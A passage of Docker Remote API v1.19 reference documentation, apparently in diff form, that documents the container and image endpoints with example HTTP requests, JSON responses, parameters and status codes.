value of the filters (a `map[string][]string`) to process on the containers list. 
Available filters: + - `exited=`; -- containers with exit code of `` ; + - `status=`(`restarting`|`running`|`paused`|`exited`) + - `label=key` or `label="key=value"` of a container label + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **500** – server error + +#### Create a container + +`POST /containers/create` + +Create a container + +**Example request**: + + POST /v1.19/containers/create HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": [ + "FOO=bar", + "BAZ=quux" + ], + "Cmd": [ + "date" + ], + "Entrypoint": null, + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": { + "/volumes/data": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "MacAddress": "12:34:56:78:9a:bc", + "ExposedPorts": { + "22/tcp": {} + }, + "HostConfig": { + "Binds": ["/tmp:/tmp"], + "Links": ["redis3:redis"], + "LxcConf": {"lxc.utsname":"docker"}, + "Memory": 0, + "MemorySwap": 0, + "CpuShares": 512, + "CpuPeriod": 100000, + "CpuQuota": 50000, + "CpusetCpus": "0,1", + "CpusetMems": "0,1", + "BlkioWeight": 300, + "OomKillDisable": false, + "PidMode": "", + "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + "DnsSearch": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", "other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "bridge", + "Devices": [], + "Ulimits": [{}], + "LogConfig": { "Type": "json-file", "Config": {} }, + "SecurityOpt": [], + "CgroupParent": "" + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id":"e90e34656806", + 
"Warnings":[] + } + +**JSON parameters**: + +- **Hostname** - A string value containing the hostname to use for the + container. +- **Domainname** - A string value containing the domain name to use + for the container. +- **User** - A string value specifying the user inside the container. +- **AttachStdin** - Boolean value, attaches to `stdin`. +- **AttachStdout** - Boolean value, attaches to `stdout`. +- **AttachStderr** - Boolean value, attaches to `stderr`. +- **Tty** - Boolean value, Attach standard streams to a `tty`, including `stdin` if it is not closed. +- **OpenStdin** - Boolean value, opens `stdin`, +- **StdinOnce** - Boolean value, close `stdin` after the 1 attached client disconnects. +- **Env** - A list of environment variables in the form of `["VAR=value", ...]` +- **Labels** - Adds a map of labels to a container. To specify a map: `{"key":"value", ... }` +- **Cmd** - Command to run specified as a string or an array of strings. +- **Entrypoint** - Set the entry point for the container as a string or an array + of strings. +- **Image** - A string specifying the image name to use for the container. +- **Volumes** - An object mapping mount point paths (strings) inside the + container to empty objects. +- **WorkingDir** - A string specifying the working directory for commands to + run in. +- **NetworkDisabled** - Boolean value, when true disables networking for the + container +- **ExposedPorts** - An object mapping ports to an empty object in the form of: + `"ExposedPorts": { "/: {}" }` +- **HostConfig** + - **Binds** – A list of bind-mounts for this container. Each item is a string in one of these forms: + + `host-src:container-dest` to bind-mount a host path into the + container. Both `host-src`, and `container-dest` must be an + _absolute_ path. + + `host-src:container-dest:ro` to make the bind-mount read-only + inside the container. Both `host-src`, and `container-dest` must be + an _absolute_ path. + - **Links** - A list of links for the container. 
Each link entry should be + in the form of `container_name:alias`. + - **LxcConf** - LXC specific configurations. These configurations only + work when using the `lxc` execution driver. + - **Memory** - Memory limit in bytes. + - **MemorySwap** - Total memory limit (memory + swap); set `-1` to enable unlimited swap. + You must use this with `memory` and make the swap value larger than `memory`. + - **CpuShares** - An integer value containing the container's CPU Shares + (ie. the relative weight vs other containers). + - **CpuPeriod** - The length of a CPU period in microseconds. + - **CpuQuota** - Microseconds of CPU time that the container can get in a CPU period. + - **CpusetCpus** - String value containing the `cgroups CpusetCpus` to use. + - **CpusetMems** - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. + - **BlkioWeight** - Block IO weight (relative weight) accepts a weight value between 10 and 1000. + - **OomKillDisable** - Boolean value, whether to disable OOM Killer for the container or not. + - **PidMode** - Set the PID (Process) Namespace mode for the container; + `"container:"`: joins another container's PID namespace + `"host"`: use the host's PID namespace inside the container + - **PortBindings** - A map of exposed container ports and the host port they + should map to. A JSON object in the form + `{ /: [{ "HostPort": "" }] }` + Take note that `port` is specified as a string and not an integer value. + - **PublishAllPorts** - Allocates a random host port for all of a container's + exposed ports. Specified as a boolean value. + - **Privileged** - Gives the container full access to the host. Specified as + a boolean value. + - **ReadonlyRootfs** - Mount the container's root filesystem as read only. + Specified as a boolean value. + - **Dns** - A list of DNS servers for the container to use. 
+ - **DnsSearch** - A list of DNS search domains + - **ExtraHosts** - A list of hostnames/IP mappings to add to the + container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`. + - **VolumesFrom** - A list of volumes to inherit from another container. + Specified in the form `[:]` + - **CapAdd** - A list of kernel capabilities to add to the container. + - **Capdrop** - A list of kernel capabilities to drop from the container. + - **RestartPolicy** – The behavior to apply when the container exits. The + value is an object with a `Name` property of either `"always"` to + always restart or `"on-failure"` to restart only when the container + exit code is non-zero. If `on-failure` is used, `MaximumRetryCount` + controls the number of times to retry before giving up. + The default is not to restart. (optional) + An ever increasing delay (double the previous delay, starting at 100mS) + is added before each restart to prevent flooding the server. + - **NetworkMode** - Sets the networking mode for the container. Supported + values are: `bridge`, `host`, `none`, and `container:` + - **Devices** - A list of devices to add to the container specified as a JSON object in the + form + `{ "PathOnHost": "/dev/deviceName", "PathInContainer": "/dev/deviceName", "CgroupPermissions": "mrw"}` + - **Ulimits** - A list of ulimits to set in the container, specified as + `{ "Name": , "Soft": , "Hard": }`, for example: + `Ulimits: { "Name": "nofile", "Soft": 1024, "Hard": 2048 }` + - **SecurityOpt**: A list of string values to customize labels for MLS + systems, such as SELinux. + - **LogConfig** - Log configuration for the container, specified as a JSON object in the form + `{ "Type": "", "Config": {"key1": "val1"}}`. + Available types: `json-file`, `syslog`, `journald`, `none`. + `syslog` available options are: `address`. + - **CgroupParent** - Path to `cgroups` under which the container's `cgroup` is created. 
If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist. + +**Query parameters**: + +- **name** – Assign the specified name to the container. Must + match `/?[a-zA-Z0-9_-]+`. + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such container +- **406** – impossible to attach (container not running) +- **409** – conflict +- **500** – server error + +#### Inspect a container + +`GET /containers/(id or name)/json` + +Return low-level information on the container `id` + +**Example request**: + + GET /v1.19/containers/4fa6e0f0c678/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "AppArmorProfile": "", + "Args": [ + "-c", + "exit 9" + ], + "Config": { + "AttachStderr": true, + "AttachStdin": false, + "AttachStdout": true, + "Cmd": [ + "/bin/sh", + "-c", + "exit 9" + ], + "Domainname": "", + "Entrypoint": null, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts": null, + "Hostname": "ba033ac44011", + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "MacAddress": "", + "NetworkDisabled": false, + "OnBuild": null, + "OpenStdin": false, + "PortSpecs": null, + "StdinOnce": false, + "Tty": false, + "User": "", + "Volumes": null, + "WorkingDir": "" + }, + "Created": "2015-01-06T15:47:31.485331387Z", + "Driver": "devicemapper", + "ExecDriver": "native-0.2", + "ExecIDs": null, + "HostConfig": { + "Binds": null, + "BlkioWeight": 0, + "CapAdd": null, + "CapDrop": null, + "ContainerIDFile": "", + "CpusetCpus": "", + "CpusetMems": "", + "CpuShares": 0, + "CpuPeriod": 100000, + "Devices": [], + "Dns": null, + "DnsSearch": null, + "ExtraHosts": null, + "IpcMode": "", + "Links": null, + "LxcConf": [], + "Memory": 0, + "MemorySwap": 0, + "OomKillDisable": false, + 
"NetworkMode": "bridge", + "PidMode": "", + "PortBindings": {}, + "Privileged": false, + "ReadonlyRootfs": false, + "PublishAllPorts": false, + "RestartPolicy": { + "MaximumRetryCount": 2, + "Name": "on-failure" + }, + "LogConfig": { + "Config": null, + "Type": "json-file" + }, + "SecurityOpt": null, + "VolumesFrom": null, + "Ulimits": [{}] + }, + "HostnamePath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname", + "HostsPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Id": "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39", + "Image": "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2", + "MountLabel": "", + "Name": "/boring_euclid", + "NetworkSettings": { + "Bridge": "", + "Gateway": "", + "IPAddress": "", + "IPPrefixLen": 0, + "MacAddress": "", + "PortMapping": null, + "Ports": null + }, + "Path": "/bin/sh", + "ProcessLabel": "", + "ResolvConfPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf", + "RestartCount": 1, + "State": { + "Error": "", + "ExitCode": 9, + "FinishedAt": "2015-01-06T15:47:32.080254511Z", + "OOMKilled": false, + "Paused": false, + "Pid": 0, + "Restarting": false, + "Running": true, + "StartedAt": "2015-01-06T15:47:32.072697474Z" + }, + "Volumes": {}, + "VolumesRW": {} + } + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### List processes running inside a container + +`GET /containers/(id or name)/top` + +List processes running inside the container `id`. On Unix systems this +is done by running the `ps` command. This endpoint is not +supported on Windows. 
 + +**Example request**: + + GET /v1.19/containers/4fa6e0f0c678/top HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "UID", "PID", "PPID", "C", "STIME", "TTY", "TIME", "CMD" + ], + "Processes" : [ + [ + "root", "13642", "882", "0", "17:03", "pts/0", "00:00:00", "/bin/bash" + ], + [ + "root", "13735", "13642", "0", "17:06", "pts/0", "00:00:00", "sleep 10" + ] + ] + } + +**Example request**: + + GET /v1.19/containers/4fa6e0f0c678/top?ps_args=aux HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "USER","PID","%CPU","%MEM","VSZ","RSS","TTY","STAT","START","TIME","COMMAND" + ], + "Processes" : [ + [ + "root","13642","0.0","0.1","18172","3184","pts/0","Ss","17:03","0:00","/bin/bash" + ], + [ + "root","13895","0.0","0.0","4348","692","pts/0","S+","17:15","0:00","sleep 10" + ] + ] + } + +**Query parameters**: + +- **ps_args** – `ps` arguments to use (e.g., `aux`), defaults to `-ef` + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container logs + +`GET /containers/(id or name)/logs` + +Get `stdout` and `stderr` logs from the container ``id`` + +> **Note**: +> This endpoint works only for containers with the `json-file` or `journald` logging drivers. + +**Example request**: + + GET /v1.19/containers/4fa6e0f0c678/logs?stderr=1&stdout=1&timestamps=1&follow=1&tail=10&since=1428990821 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **follow** – 1/True/true or 0/False/false, return stream. Default `false`. +- **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`. +- **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`. +- **since** – UNIX timestamp (integer) to filter logs. 
Specifying a timestamp + will only output log-entries since that timestamp. Default: 0 (unfiltered) +- **timestamps** – 1/True/true or 0/False/false, print timestamps for + every log line. Default `false`. +- **tail** – Output specified number of lines at the end of logs: `all` or ``. Default all. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **404** – no such container +- **500** – server error + +#### Inspect changes on a container's filesystem + +`GET /containers/(id or name)/changes` + +Inspect changes on container `id`'s filesystem + +**Example request**: + + GET /v1.19/containers/4fa6e0f0c678/changes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Path": "/dev", + "Kind": 0 + }, + { + "Path": "/dev/kmsg", + "Kind": 1 + }, + { + "Path": "/test", + "Kind": 1 + } + ] + +Values for `Kind`: + +- `0`: Modify +- `1`: Add +- `2`: Delete + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Export a container + +`GET /containers/(id or name)/export` + +Export the contents of container `id` + +**Example request**: + + GET /v1.19/containers/4fa6e0f0c678/export HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/octet-stream + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container stats based on resource usage + +`GET /containers/(id or name)/stats` + +This endpoint returns a live stream of a container's resource usage statistics. 
+ +**Example request**: + + GET /v1.19/containers/redis1/stats HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "read" : "2015-01-08T22:57:31.547920715Z", + "network" : { + "rx_dropped" : 0, + "rx_bytes" : 648, + "rx_errors" : 0, + "tx_packets" : 8, + "tx_dropped" : 0, + "rx_packets" : 8, + "tx_errors" : 0, + "tx_bytes" : 648 + }, + "memory_stats" : { + "stats" : { + "total_pgmajfault" : 0, + "cache" : 0, + "mapped_file" : 0, + "total_inactive_file" : 0, + "pgpgout" : 414, + "rss" : 6537216, + "total_mapped_file" : 0, + "writeback" : 0, + "unevictable" : 0, + "pgpgin" : 477, + "total_unevictable" : 0, + "pgmajfault" : 0, + "total_rss" : 6537216, + "total_rss_huge" : 6291456, + "total_writeback" : 0, + "total_inactive_anon" : 0, + "rss_huge" : 6291456, + "hierarchical_memory_limit" : 67108864, + "total_pgfault" : 964, + "total_active_file" : 0, + "active_anon" : 6537216, + "total_active_anon" : 6537216, + "total_pgpgout" : 414, + "total_cache" : 0, + "inactive_anon" : 0, + "active_file" : 0, + "pgfault" : 964, + "inactive_file" : 0, + "total_pgpgin" : 477 + }, + "max_usage" : 6651904, + "usage" : 6537216, + "failcnt" : 0, + "limit" : 67108864 + }, + "blkio_stats" : {}, + "cpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24472255, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100215355, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 739306590000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + }, + "precpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24350896, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100093996, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 9492140000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + } + } + +The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu 
usage percentage. It is not an exact copy of the `cpu_stats` field. + +**Query parameters**: + +- **stream** – 1/True/true or 0/False/false; when `false`, pull stats once, then disconnect. Default `true`. + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Resize a container TTY + +`POST /containers/(id or name)/resize?h=<height>&w=<width>` + +Resize the TTY for container with `id`. You must restart the container for the resize to take effect. + +**Example request**: + + POST /v1.19/containers/4fa6e0f0c678/resize?h=40&w=80 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – cannot resize container + +#### Start a container + +`POST /containers/(id or name)/start` + +Start the container `id` + +> **Note**: +> For backwards compatibility, this endpoint accepts a `HostConfig` as JSON-encoded request body. +> See [create a container](#create-a-container) for details. 
+ +**Example request**: + + POST /v1.19/containers/e90e34656806/start HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **304** – container already started +- **404** – no such container +- **500** – server error + +#### Stop a container + +`POST /containers/(id or name)/stop` + +Stop the container `id` + +**Example request**: + + POST /v1.19/containers/e90e34656806/stop?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **304** – container already stopped +- **404** – no such container +- **500** – server error + +#### Restart a container + +`POST /containers/(id or name)/restart` + +Restart the container `id` + +**Example request**: + + POST /v1.19/containers/e90e34656806/restart?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Kill a container + +`POST /containers/(id or name)/kill` + +Kill the container `id` + +**Example request**: + + POST /v1.19/containers/e90e34656806/kill HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **signal** - Signal to send to the container: integer or string like `SIGINT`. + When not set, `SIGKILL` is assumed and the call waits for the container to exit. 
+ +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Rename a container + +`POST /containers/(id or name)/rename` + +Rename the container `id` to a `new_name` + +**Example request**: + + POST /v1.19/containers/e90e34656806/rename?name=new_name HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **name** – new name for the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **409** - conflict name already assigned +- **500** – server error + +#### Pause a container + +`POST /containers/(id or name)/pause` + +Pause the container `id` + +**Example request**: + + POST /v1.19/containers/e90e34656806/pause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Unpause a container + +`POST /containers/(id or name)/unpause` + +Unpause the container `id` + +**Example request**: + + POST /v1.19/containers/e90e34656806/unpause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Attach to a container + +`POST /containers/(id or name)/attach` + +Attach to the container `id` + +**Example request**: + + POST /v1.19/containers/16253994b7c4/attach?logs=1&stream=0&stdout=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. 
+- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +**Stream details**: + +When using the TTY setting is enabled in +[`POST /containers/create` +](#create-a-container), +the stream is the raw data from the process PTY and client's `stdin`. +When the TTY is disabled, then the stream is multiplexed to separate +`stdout` and `stderr`. + +The format is a **Header** and a **Payload** (frame). + +**HEADER** + +The header contains the information which the stream writes (`stdout` or +`stderr`). It also contains the size of the associated frame encoded in the +last four bytes (`uint32`). + +It is encoded on the first eight bytes like this: + + header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4} + +`STREAM_TYPE` can be: + +- 0: `stdin` (is written on `stdout`) +- 1: `stdout` +- 2: `stderr` + +`SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of +the `uint32` size encoded as big endian. + +**PAYLOAD** + +The payload is the raw stream. + +**IMPLEMENTATION** + +The simplest way to implement the Attach protocol is the following: + + 1. Read eight bytes. + 2. Choose `stdout` or `stderr` depending on the first byte. + 3. Extract the frame size from the last four bytes. + 4. Read the extracted size and output it on the correct output. + 5. Goto 1. 
+ +#### Attach to a container (websocket) + +`GET /containers/(id or name)/attach/ws` + +Attach to the container `id` via websocket + +Implements websocket protocol handshake according to [RFC 6455](http://tools.ietf.org/html/rfc6455) + +**Example request** + + GET /v1.19/containers/e90e34656806/attach/ws?logs=0&stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 + +**Example response** + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +#### Wait a container + +`POST /containers/(id or name)/wait` + +Block until container `id` stops, then returns the exit code + +**Example request**: + + POST /v1.19/containers/16253994b7c4/wait HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"StatusCode": 0} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Remove a container + +`DELETE /containers/(id or name)` + +Remove the container `id` from the filesystem + +**Example request**: + + DELETE /v1.19/containers/16253994b7c4?v=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **v** – 1/True/true or 0/False/false, Remove the volumes + associated to the container. Default `false`. +- **force** - 1/True/true or 0/False/false, Kill then remove the container. 
+ Default `false`. + +**Status codes**: + +- **204** – no error +- **400** – bad parameter +- **404** – no such container +- **409** – conflict +- **500** – server error + +#### Copy files or folders from a container + +`POST /containers/(id or name)/copy` + +Copy files or folders of container `id` + +**Example request**: + + POST /v1.19/containers/4fa6e0f0c678/copy HTTP/1.1 + Content-Type: application/json + + { + "Resource": "test.txt" + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +### 2.2 Images + +#### List Images + +`GET /images/json` + +**Example request**: + + GET /v1.19/images/json?all=0 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "RepoTags": [ + "ubuntu:12.04", + "ubuntu:precise", + "ubuntu:latest" + ], + "Id": "8dbd9e392a964056420e5d58ca5cc376ef18e2de93b5cc90e868a1bbc8318c1c", + "Created": 1365714795, + "Size": 131506275, + "VirtualSize": 131506275, + "Labels": {} + }, + { + "RepoTags": [ + "ubuntu:12.10", + "ubuntu:quantal" + ], + "ParentId": "27cf784147099545", + "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc", + "Created": 1364102658, + "Size": 24653, + "VirtualSize": 180116135, + "Labels": { + "com.example.version": "v1" + } + } + ] + +**Example request, with digest information**: + + GET /v1.19/images/json?digests=1 HTTP/1.1 + +**Example response, with digest information**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Created": 1420064636, + "Id": "4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125", + "ParentId": "ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2", + "RepoDigests": [ + "localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags": [ + 
"localhost:5000/test/busybox:latest", + "playdate:latest" + ], + "Size": 0, + "VirtualSize": 2429728, + "Labels": {} + } + ] + +The response shows a single image `Id` associated with two repositories +(`RepoTags`): `localhost:5000/test/busybox`: and `playdate`. A caller can use +either of the `RepoTags` values `localhost:5000/test/busybox:latest` or +`playdate:latest` to reference the image. + +You can also use `RepoDigests` values to reference an image. In this response, +the array has only one reference and that is to the +`localhost:5000/test/busybox` repository; the `playdate` repository has no +digest. You can reference this digest using the value: +`localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d...` + +See the `docker run` and `docker build` commands for examples of digest and tag +references on the command line. + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, default false +- **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters: + - `dangling=true` + - `label=key` or `label="key=value"` of an image label +- **filter** - only return images with the specified name + +#### Build image from a Dockerfile + +`POST /build` + +Build an image from a Dockerfile + +**Example request**: + + POST /v1.19/build HTTP/1.1 + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"stream": "Step 1/5..."} + {"stream": "..."} + {"error": "Error...", "errorDetail": {"code": 123, "message": "Error..."}} + +The input stream must be a `tar` archive compressed with one of the +following algorithms: `identity` (no compression), `gzip`, `bzip2`, `xz`. + +The archive must include a build instructions file, typically called +`Dockerfile` at the archive's root. The `dockerfile` parameter may be +used to specify a different build instructions file. 
To do this, its value must be +the path to the alternate build instructions file to use. + +The archive may include any number of other files, +which are accessible in the build context (See the [*ADD build +command*](../reference/builder.md#add)). + +The Docker daemon performs a preliminary validation of the `Dockerfile` before +starting the build, and returns an error if the syntax is incorrect. After that, +each instruction is run one-by-one until the ID of the new image is output. + +The build is canceled if the client drops the connection by quitting +or being killed. + +**Query parameters**: + +- **dockerfile** - Path within the build context to the Dockerfile. This is + ignored if `remote` is specified and points to an individual filename. +- **t** – A name and optional tag to apply to the image in the `name:tag` format. + If you omit the `tag` the default `latest` value is assumed. +- **remote** – A Git repository URI or HTTP/HTTPS URI build source. If the + URI specifies a filename, the file's contents are placed into a file + called `Dockerfile`. +- **q** – Suppress verbose build output. +- **nocache** – Do not use the cache when building the image. +- **pull** - Attempt to pull the image even if an older image exists locally. +- **rm** - Remove intermediate containers after a successful build (default behavior). +- **forcerm** - Always remove intermediate containers (includes `rm`). +- **memory** - Set memory limit for build. +- **memswap** - Total memory (memory + swap), `-1` to enable unlimited swap. +- **cpushares** - CPU shares (relative weight). +- **cpusetcpus** - CPUs in which to allow execution (e.g., `0-3`, `0,1`). +- **cpuperiod** - The length of a CPU period in microseconds. +- **cpuquota** - Microseconds of CPU time that the container can get in a CPU period. + +**Request Headers**: + +- **Content-type** – Set to `"application/tar"`. 
+- **X-Registry-Config** – base64-encoded ConfigFile object + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Create an image + +`POST /images/create` + +Create an image either by pulling it from the registry or by importing it + +**Example request**: + + POST /v1.19/images/create?fromImage=busybox&tag=latest HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pulling..."} + {"status": "Pulling", "progress": "1 B/ 100 B", "progressDetail": {"current": 1, "total": 100}} + {"error": "Invalid..."} + ... + +When using this endpoint to pull an image from the registry, the +`X-Registry-Auth` header can be used to include +a base64-encoded AuthConfig object. + +**Query parameters**: + +- **fromImage** – Name of the image to pull. +- **fromSrc** – Source to import. The value may be a URL from which the image + can be retrieved or `-` to read the image from the request body. +- **repo** – Repository name. +- **tag** – Tag. If empty when pulling an image, this causes all tags + for the given image to be pulled. 
+ +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object + +**Status codes**: + +- **200** – no error +- **404** - repository does not exist or no read access +- **500** – server error + + + +#### Inspect an image + +`GET /images/(name)/json` + +Return low-level information on the image `name` + +**Example request**: + + GET /v1.19/images/ubuntu/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Created": "2013-03-23T22:24:18.818426-07:00", + "Container": "3d67245a8d72ecf13f33dffac9f79dcdf70f75acb84d308770391510e0c23ad0", + "ContainerConfig": { + "Hostname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": false, + "AttachStderr": false, + "Tty": true, + "OpenStdin": true, + "StdinOnce": false, + "Env": null, + "Cmd": ["/bin/bash"], + "Dns": null, + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": null, + "VolumesFrom": "", + "WorkingDir": "" + }, + "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc", + "Parent": "27cf784147099545", + "Size": 6824592 + } + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Get the history of an image + +`GET /images/(name)/history` + +Return the history of the image `name` + +**Example request**: + + GET /v1.19/images/ubuntu/history HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710", + "Created": 1398108230, + "CreatedBy": "/bin/sh -c #(nop) ADD file:eb15dbd63394e063b805a3c32ca7bf0266ef64676d5a6fab4801f2e81e2a5148 in /", + "Tags": [ + "ubuntu:lucid", + 